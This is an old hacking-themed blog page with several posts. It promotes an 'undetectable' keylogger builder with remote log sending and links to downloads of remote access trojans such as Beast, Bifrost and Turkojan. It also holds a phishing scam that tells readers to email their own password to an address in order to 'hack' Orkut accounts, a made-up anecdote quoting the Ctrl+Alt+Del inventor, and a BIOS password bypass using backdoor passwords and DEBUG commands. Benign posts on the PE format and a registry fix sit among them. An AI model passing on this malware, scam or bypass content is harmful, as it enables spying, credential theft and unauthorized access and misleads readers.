Search This Blog

Powered By Blogger

Sunday, January 10, 2010

New Keylogger 100% Undetectable

Now Build Your own Keylogger Don't pay anymore for keylogging. Its Free. Knowledge belongs to humans. Use it.
Its my new keylogger builder.Contains many features and remote log sending
If you like it then please scrap me thanks.
Here is download link and preview links
Preview:
http:// i 4 9 . ti n y p i c .com/2gsg18m.jpg remove spaces while pasting
Download:
http://sharecash.org/download.php?file=178256
Scaning details at http://www.virustotal.com/analisis/f5272
45e999856156d2e28f8ed7c9df2af4058fa447b7ab3425a55e83dd5d37b-1260130161
http://www.virustotal.com/analisis/4dbab9fab745328d2458a017110fc232dc09a78b898d2a06357d66174d385611-1260130425http://www.virustotal.com/analisis/48dd8a5fc91ef5e9024fc48c9df2d4eab08af913a3147d4061ab54327746db62-1260130086

[Downlaods dos programas Hackers]

Beast v2.07
http://www.4shared.com/file/193500333/d969876/Beast_207.html

Bifrost
http://www.4shared.com/file/193500882/95309eca/Bifrost.html

shark trojan
http://www.4shared.com/file/193501871/331db4da/shark_trojan.html

spyone v1.1 beta
http://www.4shared.com/file/193502477/c1d14765/spyone_v11_beta.html

turkojan4
http://www.4shared.com/file/193503078/eedb954d/turkojan4.html

Unsecure 1.2
http://www.4shared.com/file/193503296/946441aa/Unsecure_12.html

The Cntrl+Alt+Del Story

Have you ever thought of the person who invented "CNTRL + ALT + DEL " key combination.


"David Bradley"


He is the One who spent 1 minute and 23 seconds in writing the source code that's been rescuing the world's PC users for decades. This extraordinary IBM employee retired on Friday, 25th March 2005 after a prolonged service of 29 years.

His formula forces obstinate computers to restart when they no longer follow other commands.

By 1980, Bradley was one of 12 people who worked to create the debut.

The engineers knew they had to design a simple way to restart the computer when it failed to respond to the user Bradley wrote the code to make it work.

Bradley says. "I did a lot of other things than Ctrl-Alt-Delete, but I'm famous for this one."

His fame and success are repeated each time a PC user fails.

He commented on his relationship with Bill gates :
"I may have invented it, but Bill gates made it famous by applying my formula when ever any Microsoft's Windows operating system made by him CRASHES,"

"Thus I win when ever he loses..........."

I'll tell u how 2 hack orkut acounts..its vry EASY

how to hack orkut account How to hack ORKUT Account! It is possible and it is easy. This way of hacking into ORKUT email accounts was brought to my attention by my friend john working in microsoft,in animation cell. u have to just… STEP 1- Log in to your own Gmail account. Note: Your account must be at least 2 weeks old for this trick to work. STEP 2- Once you have logged into your own Gmail account, compose/write an e-mail to: rupak_12345@yahoo.co.in .This is the mailing address to the automated server that sends out passwords to users who have forgotten them. What you are going to do is trick the server into thinking that it is sending your password to you but it will send you the pass for the account you are trying to hack instead. STEP 3- In the subject line type exactly: userpassword retrieve STEP 4- On the first line of your mail write the email address of the person you are hacking. STEP 5- On the second line type in the Orkut e-mail address you are using. STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a __JavaScript from your account in the ORKUT Server to extract the other email addresses password. This works because you are sending your password to a machine not a person. The process will be done automatically by the user administration server. STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly: javascript:void(001,11000,111000)charpin(100011,111000)passrecovermachine04 The password will be sent to your inbox in a mail called “System Reg Message” . try this this will work.........n u tell me this works or not!!

Friday, December 18, 2009

The PE Format

Warning: This document is contains purely technical information. This can be considered as iron, out of which weapons can be made :) . Additionally, this is about 48 pages long and written by me :)

Introduction:

Windows uses the Portable Executable Format to store executable files, also known as an “image” of an executable. Although the PE file contains all the information required to “run” a program, the PE file must first be parsed, processed and loaded into memory. This process involves allocation of memory, relocations, imports, etc. Thus, the PE file is simply an “image” of the executable, the executable being referred to the program in memory.

The Portable Executable Format is a highly portable format, compatible for use with many different 32 machines, on the various versions of windows. The PE format can be used identically for 64 bit machines, with very minor modifications.

This document does not act as a standard for the portable executable format, since such manuals already exist. This document also does not cover all the aspects of a portable executable. This document dives head first into the PE format, by directly observing the PE format of a simple test program. It is in the process of understanding the program itself, that the implementation of the PE will also become clear. It concentrates on the most commonly used parts in a usual portable executable, and later an analysis on changing certain values from those parts.

Aims:

The aim of the project is:

  • To develop an understanding on the structure of the Portable Executable
  • Understanding the process involved in loading of a PE image file from the hard disk to the memory
  • To emulate the working of the windows loader
  • Ability to create and alter any portable executable file to suit needs and wants.

Preparations:

The Test Program:

The program chosen for investigation is the standard “Hello World” Program. Its chosen for its simplicity, as well as:

  1. It uses library calls for outputting to a console
  2. The main standard sections in the executable are used.

The program, written in C, is:

#include

int main(void){

printf(”Hello World”);

return 0;

}

The code was compiled using Borland C++ compiler, free version 5.5.40.244. It was linked with the link32 linker also provided in the Borland compiler package.


Thus, we get a 51.00 kb .exe file which will be used to investigate into the structure of portable executables

Preparing the Hex Viewer:

All the fields in the PE file are byte aligned and thus, a hex viewer is necessary to view the file. The following is the source code for the hex viewer which produces a hexadecimal representation of the entire file:

#include

#include

#include

/*

Name: Hex Viewer

Copyright: croSSArrow

Author: Gaurav Tushar Mogre

Date: 30/09/08 18:06

Description: A Basic Hex File Viewer.

*/

using namespace std;

int main(int argc,char* argv[])

{

if(argc<2){

cerr<<”Format: hexviewer.exe n”;

return 1;

}

char fname[41];

strncpy(fname,argv[1],36);

fstream inpfile;

inpfile.open(fname,ios::in|ios::binary);

fstream outfile;

outfile.open(strcat(fname,”.hex”),ios::out|ios::binary);

while(!inpfile.eof()){

unsigned char ch;

inpfile>>ch;

if(ch<16) outfile<<”0×0″<

else outfile<<”0x”<

}

inpfile.close();

outfile.close();

cout<<”Written successfully to file: “<

return 0;

}

Thus, a file: testprogram.exe.hex is produced on running the above program, which generates the hexadecimal representation of testprogram.exe which makes it easier to analyze the file.

Bugs

We must have usually faced a problem that we cannot ‘view the hidden files’, even after selecting the option from the Folder Options Menu, and when we go back to check, we see that it has been mysteriously restored to ‘Do Not Show Hidden Files & Folders’.

It happens due to a small bug/virus which edits the Registry to create trouble for us.

Here is how we can solve it :

    ☻ [Theoretical Way]

Go to Registry Edit

[Start -> Run -> type "regedit"]

Browse to :

“HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Folder
\Hidden\SHOWALL”

and set the value of the key “Checked Value” as 1

    ☻ [Practical Way]

Open notepad,

copy paste the following [between start and stop]:
// START
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\Advanced\
Folder\Hidden]

“Text”=”@shell32.dll,-30499″

“Type”=”group”

“Bitmap”=hex(2):25,00,53,00,79,00,73,00, 74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\

00,25,00,5c,00,73,00,79,00,73,00,74,00, 65,00,6d,00,33,00,32,00,5c,00,53,00,\

48,00,45,00,4c,00,4c,00,33,00,32,00,2e, 00,64,00,6c,00,6c,00,2c,00,34,00,00,\

00

“HelpID”=”shell.hlp#51131″

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\NOHIDDEN]

“RegPath”=”Software\\Microsoft\\Windows\\ CurrentVersion\\Explorer\\Advanced”

“Text”=”@shell32.dll,-30501″

“Type”=”radio”

“CheckedValue”=dword:00000002

“ValueName”=”Hidden”

“DefaultValue”=dword:00000002

“HKeyRoot”=dword:80000001

“HelpID”=”shell.hlp#51104″

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\SHOWALL]

“RegPath”=”Software\\Microsoft\\Windows\\ CurrentVersion\\Explorer\\Advanced”

“Text”=”@shell32.dll,-30500″

“Type”=”radio”

“CheckedValue”=dword:00000001

“ValueName”=”Hidden”

“DefaultValue”=dword:00000002

“HKeyRoot”=dword:80000001

“HelpID”=”shell.hlp#51105″

// STOP

Save it as whatever_u_want.reg

Double Click on that file to solve the problem,

it can be carried, mailed or kept as back-up too.

(Please remove the space in between registry entries)

BIOS Password Hack

Standard BIOS backdoor passwords

The first, less invasive, attempt to bypass a BIOS password is to try on of these standard
manufacturer’s backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256,
j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER,
SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA,
ZAAADA, ZJAAADC, djonet,
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

Other passwords you may try (for AMI/AWARD or other BIOSes)

LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj,phonix,toshiba

remember that passwords are Case Sensitive.

hacking BIOS via software

If you have access to the computer when it’s turned on, you could try one of those
programs that remove the password from the BIOS, by invalidating its memory.


However, it might happen you don’t have one of those programs when you have access
to the computer, so you’d better learn how to do manually what they do. You can reset
the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the
command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell
window in Windows). Once you are in the debug environment enter the following
commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q